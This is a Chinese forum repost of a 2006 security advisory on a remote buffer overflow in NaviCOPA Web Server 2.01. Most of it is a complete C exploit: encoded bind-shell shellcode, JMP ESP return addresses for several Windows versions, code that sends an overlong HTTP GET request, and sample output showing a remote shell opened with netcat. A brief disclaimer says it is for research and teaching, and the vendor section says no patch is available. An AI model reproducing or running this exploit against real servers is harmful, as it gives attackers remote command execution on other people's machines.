‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]NaviCOPA Web Server远程缓冲区溢出漏洞

knight

晶莹剔透§烈日灼然

Rank: 1

帖子
224 
精华
2 
积分
725 
阅读权限
50 
性别
男 
来自
桂林电子科技大学 
在线时间
121 小时 
注册时间
2005-8-9 
最后登录
2007-5-16 
楼主 发表于 2006-10-4 14:15  只看该作者

[转载]NaviCOPA Web Server远程缓冲区溢出漏洞

信息来源:绿盟科技

所有系统 >AIX >BSD(eg,OpenBSD) >Digital Unix >HP-UX >IRIX >Linux >FreeBSD >SCO UNIX >SunOS >Solaris >Windows  所有类型 远程进入系统 本地越权访问 拒绝服务攻击 嵌入恶意代码 Web数据接口 其他类型   
NaviCOPA Web Server远程缓冲区溢出漏洞

发布日期:2006-09-27
更新日期:2006-09-30

受影响系统:
InterVations NaviCOPA Web Server 2.01
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 20250

NaviCOPA Web Server是一款安装在Windows系统上的Web服务器,可以自动配置HTTP访问。

NaviCOPA Web Server在处理超长请求时存在缓冲区溢出漏洞,远程攻击者可以通过向服务器发送超长请求触发缓冲区溢出,导致执行任意指令。

<*来源:h07 (h07@interia.pl
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <h07@interia.pl>
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:

C:\>navi_exp 192.168.0.1 0

  • NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
  • Coded by h07 <h07@interia.pl>
    [+] Sending buffer: OK
  • Check your shell on 192.168.0.1:4444
  • Press enter to quit


    C:\>nc -v 192.168.0.1 4444
    [192.168.0.1] 4444 (?) open
    Microsoft Windows XP [Wersja 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\windows\system32>
    */

    #include <winsock2.h>
    #define PORT 80
    #define BUFF_SIZE 1024

    typedef struct
    {
    char os_name[32];
    unsigned long ret;
    } target;


    char shellcode[] =

    /*
    Win32_bind shellcode
    Encoder: PexFnstenvMov
    Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
    Thx metasploit.com
    */

    "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x91\xba\x06"
    "\x13\x83\xeb\xfc\xe2\xf4\x6d\xd0\xed\x5e\x79\x43\xf9\xec\x6e\xda"
    "\x8d\x7f\xb5\x9e\x8d\x56\xad\x31\x7a\x16\xe9\xbb\xe9\x98\xde\xa2"
    "\x8d\x4c\xb1\xbb\xed\x5a\x1a\x8e\x8d\x12\x7f\x8b\xc6\x8a\x3d\x3e"
    "\xc6\x67\x96\x7b\xcc\x1e\x90\x78\xed\xe7\xaa\xee\x22\x3b\xe4\x5f"
    "\x8d\x4c\xb5\xbb\xed\x75\x1a\xb6\x4d\x98\xce\xa6\x07\xf8\x92\x96"
    "\x8d\x9a\xfd\x9e\x1a\x72\x52\x8b\xdd\x77\x1a\xf9\x36\x98\xd1\xb6"
    "\x8d\x63\x8d\x17\x8d\x53\x99\xe4\x6e\x9d\xdf\xb4\xea\x43\x6e\x6c"
    "\x60\x40\xf7\xd2\x35\x21\xf9\xcd\x75\x21\xce\xee\xf9\xc3\xf9\x71"
    "\xeb\xef\xaa\xea\xf9\xc5\xce\x33\xe3\x75\x10\x57\x0e\x11\xc4\xd0"
    "\x04\xec\x41\xd2\xdf\x1a\x64\x17\x51\xec\x47\xe9\x55\x40\xc2\xe9"
    "\x45\x40\xd2\xe9\xf9\xc3\xf7\xd2\x17\x4f\xf7\xe9\x8f\xf2\x04\xd2"
    "\xa2\x09\xe1\x7d\x51\xec\x47\xd0\x16\x42\xc4\x45\xd6\x7b\x35\x17"
    "\x28\xfa\xc6\x45\xd0\x40\xc4\x45\xd6\x7b\x74\xf3\x80\x5a\xc6\x45"
    "\xd0\x43\xc5\xee\x53\xec\x41\x29\x6e\xf4\xe8\x7c\x7f\x44\x6e\x6c"
    "\x53\xec\x41\xdc\x6c\x77\xf7\xd2\x65\x7e\x18\x5f\x6c\x43\xc8\x93"
    "\xca\x9a\x76\xd0\x42\x9a\x73\x8b\xc6\xe0\x3b\x44\x44\x3e\x6f\xf8"
    "\x2a\x80\x1c\xc0\x3e\xb8\x3a\x11\x6e\x61\x6f\x09\x10\xec\xe4\xfe"
    "\xf9\xc5\xca\xed\x54\x42\xc0\xeb\x6c\x12\xc0\xeb\x53\x42\x6e\x6a"
    "\x6e\xbe\x48\xbf\xc8\x40\x6e\x6c\x6c\xec\x6e\x8d\xf9\xc3\x1a\xed"
    "\xfa\x90\x55\xde\xf9\xc5\xc3\x45\xd6\x7b\x61\x30\x02\x4c\xc2\x45"
    "\xd0\xec\x41\xba\x06\x13";

    char buffer[BUFF_SIZE];

    target list[] =
    {
    "XP SP2 Polish",
    0x7d168877, //JMP ESP

    "XP SP2 English",
    0x7ca58265, //JMP ESP

    "XP SP2 German",
    0x7cb4d5ac, //JMP ESP

    "2000 SP4 Polish",
    0x77596433, //JMP ESP

    "2000 SP4 English",
    0x78326433  //JMP ESP
    };

    int main(int argc, char *argv[])
    {
    WSADATA wsa;
    int sock, os, r_len, i,
    a = (sizeof(list) / sizeof(target)) - 1;
    unsigned long eip;
    struct hostent *he;
    struct sockaddr_in client;

    printf("\n
  • NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit\n");
    printf("
  • Coded by h07 <h07@interia.pl>\n");

    if(argc < 3)
    {
    printf("
  • Usage: %s <host> <system>\n", argv[0]);
    printf("
  • Sample: %s 192.168.0.1 0\n", argv[0]);
    printf("
  • Systems..\n");
    for(i = 0; i <= a; i++)
    printf("[>] %d: %s\n", i, list.os_name);
    return 1;
    }

    WSAStartup(MAKEWORD(2, 0), &wsa);

    os = atoi(argv[2]);

    if((os < 0) || (os > a))
    {
    printf("[-] Error: unknown target %d\n", os);
    return -1;
    }

    eip = list[os].ret;

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if((he = gethostbyname(argv[1])) == NULL)
    {
    printf("[-] Unable to resolve\n");
    return -1;
    }

    client.sin_addr = *((struct in_addr *)he->h_addr);
    client.sin_port = htons(PORT);
    client.sin_family = AF_INET;

    if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
    {
    printf("[-] Error: connect()\n");
    return -1;
    }

    r_len = 234;
    memset(buffer, 0x41, r_len);
    memcpy(buffer, "GET ", 4);
    *((unsigned long*)(&buffer[r_len])) = eip;
    memset(buffer + (r_len + 4), 0x90, 32);
    strcat(buffer, shellcode);
    strcat(buffer, " HTTP/1.1\r\n\r\n\x00");

    //buffer["GET " + ("A" * 230) + RET + (NOP * 32) + shellcode + " HTTP/1.1\r\n\r\n\x00"]

    if(send(sock, buffer, strlen(buffer), 0) != -1)
    {
    printf("[+] Sending buffer: OK\n");
    printf("
  • Check your shell on %s:4444\n", argv[1]);
    }
    else
    printf("[-] Sending buffer: failed\n");

    printf("
  • Press enter to quit\n");
    getchar();

    return 0;
    }

    建议:
    --------------------------------------------------------------------------------
    厂商补丁:

    InterVations
    ------------
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

    http://www.navicopa.com/
    		•

    TOP

    ‹‹ 上一主题 | 下一主题 ››
    发新话题